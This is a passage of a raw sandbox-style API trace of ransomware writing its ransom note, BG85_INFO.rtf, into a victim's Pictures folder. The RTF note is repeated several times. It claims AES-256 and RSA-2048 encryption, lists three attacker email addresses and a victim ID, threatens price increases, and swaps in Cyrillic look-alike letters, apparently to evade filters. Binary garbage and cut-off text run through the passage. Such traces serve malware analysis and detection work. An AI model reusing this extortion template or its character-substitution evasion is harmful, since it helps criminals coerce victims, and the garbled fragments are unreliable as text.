d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\np¿WD÷\x0fe^`Ì!II\x05\x8aUá³\x81Í|\x86e\x12 cG®n&lhkô\x09mË\x05\x9fös)$\x0bsã\x9d\x7fÉ\rý)sdÁ\x1bs0\x19­­Ê4ñAmÈ\x9b/Á\x86¶ó\x92\r\x7fËõ\x1aH\x985Z¾»}\"}Î4\x0e<,\\\x92 Ü3h¬bÖ|ÕÜ\x04õw\x16Æ\x87>²§Û3ÿPH\x03û¥g·nïß\x04¯Â#5c\x03ay\x0c$ç¨\x17ïWæ¼Ñù\x021+Ùv\x05ÌW.#\x8cJÈ\x99Ú°", lpUsedDefaultChar=0x0) returned 7247 [0078.580] WriteFile (in: hFile=0x1dc, lpBuffer=0x25ad0d8*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x25ad0d8*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0078.582] CloseHandle (hObject=0x1dc) returned 1 [0078.582] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\fFQRpDCXsB\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ffqrpdcxsb\\bg85_info.rtf")) returned 0xffffffff [0078.582] GetLastError () returned 0x2 [0078.582] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\fFQRpDCXsB\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ffqrpdcxsb\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0078.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0078.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to 